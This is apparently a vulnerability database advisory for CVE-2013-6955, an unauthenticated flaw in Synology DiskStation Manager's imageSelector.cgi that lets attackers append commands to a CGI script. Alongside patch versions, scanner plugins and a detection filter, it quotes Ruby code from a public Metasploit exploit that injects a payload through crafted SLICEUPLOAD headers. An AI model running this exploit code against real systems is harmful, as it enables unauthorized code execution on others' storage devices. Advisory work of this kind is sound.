CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.

Detailsinfo

A vulnerability was found in Synology DiskStation Manager 4.0-2257/4.1-2851/4.2-3236/4.3-3810 (Network Attached Storage Software) and classified as critical. This issue affects an unknown code of the file webman/imageSelector.cgi of the component SliceUpload. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-264. Impacted is confidentiality, and integrity. The summary by CVE is:

webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1 allows remote attackers to append data to arbitrary files, and consequently execute arbitrary code, via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header.

The weakness was released 12/20/2013 by Markus Wulftange with Daimler TSS GmbH as synology_dsm_sliceupload_exec_noauth.rb as not defined exploit (GitHub). The advisory is shared at github.com. The identification of this vulnerability is CVE-2013-6955 since 12/04/2013. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. Technical details as well as a public exploit are known. MITRE ATT&CK project uses the attack technique T1068 for this issue.

A public exploit has been developed by jvazquez-r7 in Ruby and been published immediately after the advisory. The exploit is available at github.com. It is declared as highly functional. The vulnerability scanner Nessus provides a plugin with the ID 72345 (Synology DiskStation Manager 4.3-x < 4.3-3810 Update 1 Multiple Vulnerabilities), which helps to determine the existence of the flaw in a target environment. It is assigned to the family CGI abuses. The commercial vulnerability scanner Qualys is able to test this issue with plugin 43355 (Synology DiskStation Manager Remote Command Execution Vulnerability). The code used by the exploit is:

cmds = [
     # sed is used to restore the redirect.cgi
     "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
     payload.encoded
   ].join("\n")

   mime_msg = Rex::MIME::Message.new
   mime_msg.add_part('login', nil, nil, 'form-data; name="source"')
   mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')

   # unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
   # so we use a placeholder and replace it later
   cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
   mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
                 'form-data; name="foo"; filename="bar"')

   post_body = mime_msg.to_s
   post_body.strip!
   post_body.sub!(cmd_placeholder, cmds)

   # fix multipart encoding
   post_body.gsub!(/\r\n(--#{mime_msg.bound})/, '  \\1')

   # send request to append shell commands
   print_status("#{peer} - Injecting the payload...")
   res = send_request_cgi({
     'method'  => 'POST',
     'uri'    => normalize_uri('webman', 'imageSelector.cgi'),
     'ctype'   => "multipart/form-data; boundary=#{mime_msg.bound}",
     'headers' => {
      'X-TYPE-NAME' => 'SLICEUPLOAD',
      'X-TMP-FILE'  => '/usr/syno/synoman/redirect.cgi'
     },
     'data'   => post_body
   })
The advisory illustrates:
This is exploited by this module to append the given commands to /redirect.cgi, which is a regular shell script file, and can be invoked with another HTTP request.

Upgrading to version 4.0-2259, 4.2-3243 or and 4.3-3810 Update 1 eliminates this vulnerability. A possible mitigation has been published even before and not after the disclosure of the vulnerability. Furthermore it is possible to detect and prevent this kind of attack with TippingPoint and the filter 17117.

The vulnerability is also documented in the databases at X-Force (89911), Tenable (72345), SecurityFocus (BID 64516†), OSVDB (101247†) and Vulnerability Center (SBV-43207†). Entry connected to this vulnerability is available at VDB-11565. Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
